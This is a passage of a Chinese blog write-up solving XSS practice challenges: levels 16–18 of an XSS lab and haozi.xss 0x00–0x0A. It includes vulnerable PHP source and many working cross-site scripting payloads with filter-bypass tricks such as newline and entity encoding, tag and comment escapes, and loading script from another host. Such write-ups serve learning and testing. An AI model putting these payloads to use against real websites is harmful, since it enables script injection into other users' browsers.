plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">2. **使用`ng-include`指令:** 在需要包含外部内容的地方使用`ng-include`指令,并指定要包含的文件路径。</span><br><span class="line"></span><br><span class="line"> ```html</span><br><span class="line"> <div ng-include="'path/to/your/template.html'"></div></span><br></pre></td></tr></table></figure> 注意:单引号内的路径可以是相对路径或绝对路径。 </code></pre> </li> <li> <p><strong>定义AngularJS模块和控制器:</strong> 在JavaScript中定义AngularJS模块和控制器,并将其与应用相关联。</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"> <span class="keyword">var</span> app = angular.<span class="title function_">module</span>(<span class="string">'myApp'</span>, []);</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"> app.<span class="title function_">controller</span>(<span class="string">'myController'</span>, <span class="keyword">function</span>(<span class="params">$scope</span>) {</span></span><br><span class="line"><span class="language-javascript"> <span class="comment">// 控制器逻辑</span></span></span><br><span class="line"><span class="language-javascript"> });</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag"></<span class="name">script</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <p><strong>关联控制器和<code>ng-include</code>:</strong> 在包含<code>ng-include</code>的元素中使用<code>ng-controller</code>来关联控制器。</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">div</span> <span class="attr">ng-controller</span>=<span class="string">"myController"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">div</span> <span class="attr">ng-include</span>=<span class="string">"'path/to/your/template.html'"</span>></span><span class="tag"></<span class="name">div</span>></span></span><br><span class="line"><span class="tag"></<span class="name">div</span>></span></span><br></pre></td></tr></table></figure> </li> </ol> <p>这样,<code>ng-include</code>指令就会加载指定的HTML文件或AngularJS模板,并将其内容包含在应用中。这是一种实现模块化和代码重用的方式,特别适用于大型AngularJS应用。</p> </li> </ul> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><html ng-app></span><br><span class="line"><head></span><br><span class="line"> <meta charset=<span class="string">"utf-8"</span>></span><br><span class="line"> <script src=<span class="string">"angular.min.js"</span>></script></span><br><span class="line"><script></span><br><span class="line">window.alert = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="function"></span>{ </span><br><span class="line"><span class="title function_ invoke__">confirm</span>(<span class="string">"完成的不错!"</span>);</span><br><span class="line"> window.location.href=<span class="string">"level16.php?keyword=test"</span>; </span><br><span class="line">}</span><br><span class="line"></script></span><br><span class="line"><title>欢迎来到level15</title></span><br><span class="line"></head></span><br><span class="line"><h1 align=center>欢迎来到第<span class="number">15</span>关,自己想个办法走出去吧!</h1></span><br><span class="line"><p align=center><img src=level15.png></p></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"src"</span>];</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<body><span class="ng-include:'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">'"></span></body>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 16</p> <p>本题在<center>标签内,根据后面的<img>标签提示,我们可以构造一个img标签</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204141319824.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204141319824.png" alt="image-20240204141319824" ></a></p> <p>经过尝试发现过滤了空格,我们可以用<code>%0A</code>换行符绕过空格</p> <p><strong>答案:<code>keyword=<img%0Asrc=1%0Aonclick="alert(1)"></code></strong></p> <p>答案实际形式:</p> <figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">keyword=<img</span><br><span class="line">src=1</span><br><span class="line">onclick="alert(1)"></span><br></pre></td></tr></table></figure> <p>源代码:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">html</span>></span><span class="comment"><!--STATUS OK--></span><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"><span class="tag"><<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">"content-type"</span> <span class="attr">content</span>=<span class="string">"text/html;charset=utf-8"</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="variable language_">window</span>.<span class="property">alert</span> = <span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="language-javascript">{ </span></span><br><span class="line"><span class="language-javascript"><span class="title function_">confirm</span>(<span class="string">"完成的不错!"</span>);</span></span><br><span class="line"><span class="language-javascript"> <span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">href</span>=<span class="string">"level17.php?arg01=a&arg02=b"</span>; </span></span><br><span class="line"><span class="language-javascript">}</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"><<span class="name">title</span>></span>欢迎来到level16<span class="tag"></<span class="name">title</span>></span></span><br><span class="line"><span class="tag"></<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">body</span>></span></span><br><span class="line"><span class="tag"><<span class="name">h1</span> <span class="attr">align</span>=<span class="string">center</span>></span>欢迎来到level16<span class="tag"></<span class="name">h1</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">ini_set("display_errors", 0);</span></span><br><span class="line"><span class="meta">$str = strtolower($_GET["keyword"]);</span></span><br><span class="line"><span class="meta">$str2=str_replace("script","&nbsp;",$str);</span></span><br><span class="line"><span class="meta">$str3=str_replace(" ","&nbsp;",$str2);</span></span><br><span class="line"><span class="meta">$str4=str_replace("/","&nbsp;",$str3);</span></span><br><span class="line"><span class="meta">$str5=str_replace(" ","&nbsp;",$str4);</span></span><br><span class="line"><span class="meta">echo "<center>".$str5."</center>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"><<span class="name">center</span>></span><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">level16.png</span>></span><span class="tag"></<span class="name">center</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">echo "<h3 align=center>payload的长度:".strlen($str5)."</h3>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"></<span class="name">body</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 17</p> <p>查看网页源代码可知有两个参数arg01和arg02,进行尝试后发现会拼接在<embed>标签内,有src属性</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204142001519.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204142001519.png" alt="image-20240204142001519" ></a></p> <p>可以构造以下payload</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204142237099.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204142237099.png" alt="image-20240204142237099" ></a></p> <p><strong>答案:<code>arg01=a&arg02= onMouseOver=alert(1)</code></strong></p> </li> <li> <p>Level 18</p> <p>本题与17题一致,payload相同</p> </li> </ul> <h3 id="haozi-xss题解">haozi.xss题解</h3> <p>网址: <a class="link" href="https://xss.haozi.me/" >https://xss.haozi.me/<i class="fas fa-external-link-alt"></i></a></p> <ul> <li> <h4 id="0x00">0x00</h4> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204143959934.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204143959934.png" alt="image-20240204143959934" ></a></p> </li> </ul> <p><strong>答案:<code><script>alert(1)</script></code></strong></p> <ul> <li> <h4 id="0x01">0x01</h4> <p>注入点在<textarea></textarea>标签中,故按照0x00的方法无法被解析,可提前闭合标签。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204144343303.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204144343303.png" alt="image-20240204144343303" ></a></p> <p><strong>答案:<code></textarea><script>alert(1)</script></code></strong></p> <p>也可以利用error事件:<code></textarea><img src="" onerror=alert(1)></code>,由于src是空,所以肯定会报错,,故通过错误调用事件成功注入</p> </li> <li> <h4 id="0x02">0x02</h4> <p>本题input标签内的value会将值转化为字符串,然后显示在输入框内,故前两题的标签闭合注入会失效,可以借鉴SQL注入的方法,将前面的双引号闭合,然后注入新的标签</p> <p>答案:<code>" > <script>alert(1)</script></code></p> <p>也可以使用onclick事件:</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204144832842.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204144832842.png" alt="image-20240204144832842" ></a></p> <p><strong>答案:<code>" onclick="alert(1)</code></strong></p> </li> <li> <h4 id="0x03">0x03</h4> <p>过滤符号:<code>() <></code> ,在JavaScript中可以使用反引号`` <code>来代替</code>()`</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204150455947.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204150455947.png" alt="image-20240204150455947" ></a></p> <p><strong>答案:<code><script>alert</code>1<code></script></code></strong></p> <p>或:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">a</span> <span class="attr">href</span>=<span class="string">javascript:alert</span>`<span class="attr">1</span>\`></span>123<span class="tag"></<span class="name">a</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <h4 id="0x04">0x04</h4> <p>过滤符号:小括号(),中括号[],反引号` 可使用HTML实体编码绕过</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204151017389.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204151017389.png" alt="image-20240204151017389" ></a></p> <p><strong>答案:</strong></p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">a</span> <span class="attr">href</span>=<span class="string">javascript:alert&#40;1&#41;</span>></span>123<span class="tag"></<span class="name">a</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <h4 id="0x05">0x05</h4> <p>HTML的注释有两种方式:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"><!-- 注释内容 --></span></span><br><span class="line"><span class="comment"><!-- 注释内容 --!></span></span><br></pre></td></tr></table></figure> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204151215313.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204151215313.png" alt="image-20240204151215313" ></a></p> <p><strong>答案:<code>--!><script>alert(1)</script></code></strong></p> </li> <li> <h4 id="0x06">0x06</h4> <p>正则表达式匹配了:<strong>auto</strong> 、<strong>以on开头且以=结尾的字符串</strong>、 <strong>></strong></p> <p>所以过滤了autofocus和onerror等事件,以及防止input标签被闭合。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204152604165.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204152604165.png" alt="image-20240204152604165" ></a></p> <p>可以通过换行<code>%0A</code>来绕过匹配,<strong>答案:</strong></p> <figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">type="image" src="" onerror</span><br><span class="line">=alert(1)</span><br><span class="line"></span><br><span class="line">onclick</span><br><span class="line">=alert(1)</span><br></pre></td></tr></table></figure> </li> <li> <h4 id="0x07">0x07</h4> <p>本题主要利用html部分单标签可以解析,例如img标签</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153048091.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153048091.png" alt="image-20240204153048091" ></a></p> <p><strong>答案:<code><img src="" onerror=alert(1)</code></strong></p> </li> <li> <h4 id="0x08">0x08</h4> <p>使用正则过滤</style>,可以多加一个空格或使用换行符造成正则逃逸。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153220204.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153220204.png" alt="image-20240204153220204" ></a></p> <p><strong>答案:<code></style ><img src=1 onerror="alert(1)"</code></strong></p> </li> <li> <h4 id="0x09">0x09</h4> <p>本题使用正则表达式白名单匹配固定网址,可在正确的网址后多加字符,再把前面的双引号闭合,再输入onerror错误事件</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153430571.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153430571.png" alt="image-20240204153430571" ></a></p> <p><strong>答案:<code>https://www.segmentfault.com" onerror="alert(1)</code></strong></p> </li> <li> <h4 id="0x0A">0x0A</h4> <p>本题通过html转义, 过滤了所有可注入的关键字,经研究(看答案)可知,可直接引用指定网站下的目录文件来达到xss注入的目的,如在靶场的目录下有个j.js文件, 内有alert(1);代码, 直接调用即可注入,<strong>答案:<code>https://www.segmentfault.com.haozi.me/j.js</code></strong></p> <p>也可用url的@语法来进行跳转调用,例如<code>https://www.baidu.com@www.bing.com</code> ,最终会跳转到bing上,根据此原理可以在其他服务器上事先写好alert(1);并跳转执行。</p> </li> <li> <h4 id="0x0B">0x0B</h4> </li> <li> <h4 id="0x0C">0x0C</h4> </li> <li> <h4 id="0x0D">0x0D</h4> </li> <li> <h4 id="0x0E">0x0E</h4> </li> <li> <h4 id="0x0F">0x0F</h4> </li> <li> <h4 id="0x10">0x10</h4> </li> <li> <h4 id="0x11">0x11</h4> </li> <li> <h4 id="0x12">0x12</h4> </li> </ul>